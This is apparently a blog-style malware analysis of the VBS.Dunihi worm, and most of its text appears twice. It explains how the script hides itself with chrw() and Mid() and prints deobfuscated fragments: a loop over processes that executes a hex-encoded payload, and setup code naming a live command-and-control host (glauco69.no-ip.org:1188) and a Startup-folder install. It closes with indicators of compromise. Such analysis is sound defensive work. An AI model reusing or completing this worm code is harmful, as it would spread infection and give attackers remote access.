VBS.Dunihi

Dunihi is a family of worms that can steal information, download and install additional files onto the system and/or install a backdoor component.

PreviousMozi Botnet NextSUNNYSTATION

Last updated 4 years ago

Was this helpful?

VBS.Dunihi

Dunihi is a family of worms that can steal information, download and install additional files onto the system and/or install a backdoor component.

Once the device is infected, under the registry key of Roaming, Startup are a vbs file called "My S*X PHOTO". The code of that file looks some like the image below. The full code are .

The first instruction "on error resume next" basically means if the code have some error only keep going. Then have 2 instruction that are the core to defuse the script:

chrw(): Return the string character for ChrCode (Unicode/DBCS). Example chrw(105) = i. The code has a lot of this instruction with different value that are the product of some operation like subtraction, addition, multiplication and division. With & concatenate.

chrw(39 * 2.94871794871795) & chrw(61 + 40) & chrw(1.92857142857143 * 56)

Mid(): MID(string, start [,length]). Returns the text string which is a substring of a larger string (String). Example:

Mid("somemore", 5, 4) '= "more"

on error resume next

set x = getobject( winmgmts:\\.\root\cimv2 )



 set y = x.execquery( select * from win32_process  ,,48) 



 dim f



 for each f in y



 if f.name =  wscript.exe then 





s = "CODE IN HEXADECIMAL"



 dim woarlds 



 woarlds = i(s) 

set w = getobject( winmgmts:\\.\root\cimv2) 



 set q = w.execquery( select * from win32_ process ,,48) 



 dim g



 for each g in q 



 if g.name =  wscript.exe   then 



 Execute(woarlds) 



 end if 



 next

host = "glauco69.no-ip.org" port = 1188 installdir = "%appdata%" lnkfile = true lnkfolder = true
dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj set httpobj = createobject("msxml2.xmlhttp")
installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & 
"\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then  
installdir = shellobj.expandenvironmentstrings("%temp%")

In the table below i put the IOCs from the sample.

Type

Value

URL

glauco69.no-ip.org:1188

SHA2

A9D0EEE033C2E2B9DD19184CCE8C5F987697BDA7454D72900AFC8D25F7C81B5E

Hope you enjoy the Analysis and feel free to get in touch with me if you have questions or suggestions.

References

PreviousMozi Botnet NextSUNNYSTATION

Last updated 4 years ago

Was this helpful?

Once the device is infected, under the registry key of Roaming, Startup are a vbs file called "My S*X PHOTO". The code of that file looks some like the image below. The full code are .

The first instruction "on error resume next" basically means if the code have some error only keep going. Then have 2 instruction that are the core to defuse the script:

chrw(): Return the string character for ChrCode (Unicode/DBCS). Example chrw(105) = i. The code has a lot of this instruction with different value that are the product of some operation like subtraction, addition, multiplication and division. With & concatenate.

chrw(39 * 2.94871794871795) & chrw(61 + 40) & chrw(1.92857142857143 * 56)

Mid(): MID(string, start [,length]). Returns the text string which is a substring of a larger string (String). Example:

Mid("somemore", 5, 4) '= "more"

Before we work all the operations we have a outcome like the code block below. The full code in clear are . With this the worm wants to list the process and search for wscript to the code in hexadecimal of the variable s.

on error resume next

set x = getobject( winmgmts:\\.\root\cimv2 )



 set y = x.execquery( select * from win32_process  ,,48) 



 dim f



 for each f in y



 if f.name =  wscript.exe then 





s = "CODE IN HEXADECIMAL"



 dim woarlds 



 woarlds = i(s) 

set w = getobject( winmgmts:\\.\root\cimv2) 



 set q = w.execquery( select * from win32_ process ,,48) 



 dim g



 for each g in q 



 if g.name =  wscript.exe   then 



 Execute(woarlds) 



 end if 



 next

The code stored in the variable s are in hexadecimal and after make the recipe with cyberchef we outcome the code below. In this part the worm want to dowload a file from the url "glauco69.no-ip.org:1188", a reference for this is the code shared by Here are a extract of the code:

host = "glauco69.no-ip.org" port = 1188 installdir = "%appdata%" lnkfile = true lnkfolder = true
dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj set httpobj = createobject("msxml2.xmlhttp")
installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & 
"\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then  
installdir = shellobj.expandenvironmentstrings("%temp%")

In the table below i put the IOCs from the sample.

Type

Value

URL

glauco69.no-ip.org:1188

SHA2

A9D0EEE033C2E2B9DD19184CCE8C5F987697BDA7454D72900AFC8D25F7C81B5E

Hope you enjoy the Analysis and feel free to get in touch with me if you have questions or suggestions.

References